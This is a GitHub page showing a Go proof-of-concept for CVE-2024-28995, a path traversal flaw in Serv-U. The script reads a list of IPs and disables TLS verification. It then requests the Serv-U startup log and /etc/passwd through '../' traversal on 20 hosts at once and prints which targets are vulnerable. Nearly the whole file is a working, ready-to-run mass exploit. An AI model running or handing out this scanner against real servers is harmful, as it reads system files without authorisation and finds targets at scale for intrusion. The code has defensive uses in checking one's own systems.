-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathCVE-2024-28995.go
102 lines (84 loc) · 2.78 KB
/
CVE-2024-28995.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
package main
import (
"net/http"
"crypto/tls"
"os"
"fmt"
"bufio"
"io"
"strings"
"errors"
"sync"
)
var Reset = "\033[0m"
var Red = "\033[31m"
var Green = "\033[32m"
var Yellow = "\033[33m"
func makeReq(url string) (string, error){
resp, err := http.Get(url)
if(err != nil){
return "", err
}
defer resp.Body.Close()
if resp.StatusCode == http.StatusOK {
bodyBytes, err := io.ReadAll(resp.Body)
if err != nil {
return "", err
}
bodyStr := string(bodyBytes)
return bodyStr, nil
}
return "", errors.New("http.Status is not 200")
}
func checkIfPathExists(baseUrl string, wg *sync.WaitGroup, semaphore chan struct{}) {
defer wg.Done()
pathsToCheck :=[]string {"/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt", "/?InternalDir=\\..\\..\\..\\etc&InternalFile=passwd"}
for _,path := range pathsToCheck{
bodyStr, err := makeReq("https://"+baseUrl+path)
if err != nil{
fmt.Printf("%s[-] Not Vulnerable : %s%s\n", Red, baseUrl, Reset)
return
}
if strings.Contains(bodyStr, "Operating System: Windows Server"){
fmt.Printf("%s[+] Vulnerable Windows Device : %s%s\n", Green, baseUrl, Reset)
} else if (strings.Contains(bodyStr, "root:x") || strings.Contains(bodyStr, "bin:x") || strings.Contains(bodyStr, "admin:x") || strings.Contains(bodyStr, "sys:x")){
fmt.Printf("%s[+] Vulnerable Linux Device : %s%s\n", Green, baseUrl, Reset)
} else {
fmt.Printf("%s[-] Not Vulnerable : %s%s\n", Red, baseUrl, Reset)
}
}
<-semaphore
}
func main() {
fmt.Println(`
::: ::: ::::::::: :::::::: ::: ::: ::::::::: ::::::::::: ::::::: :::: :::
:+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+: :+:+: :+:
+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ :+:+ :+:+:+ +:+
+#++:++ +#++:++#: +#++: +#++: +#++:++#+ +#+ +#+ + +:+ +#+ +:+ +#+
+#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+ +#+# +#+ +#+ +#+#+#
#+# #+# #+# #+# #+# #+# #+# #+# #+# #+# #+# #+# #+#+#
### ### ### ### ######## ### ### ### ####### ### ####
-> CVE-2024-28995 (PoC)
-> https://github.com/krypton-kry/CVE-2024-28995
`)
http.DefaultTransport.(*http.Transport).TLSClientConfig = &tls.Config{InsecureSkipVerify: true}
file, err := os.Open("ips.txt")
if err != nil {
panic(err)
}
defer file.Close()
var ips []string
scanner := bufio.NewScanner(file)
for scanner.Scan() {
ips = append(ips, scanner.Text())
}
const max = 20
semaphore := make(chan struct{}, max)
wg := &sync.WaitGroup{}
for _, ip := range ips {
semaphore <- struct{}{}
wg.Add(1)
go checkIfPathExists(ip, wg, semaphore)
}
wg.Wait()
}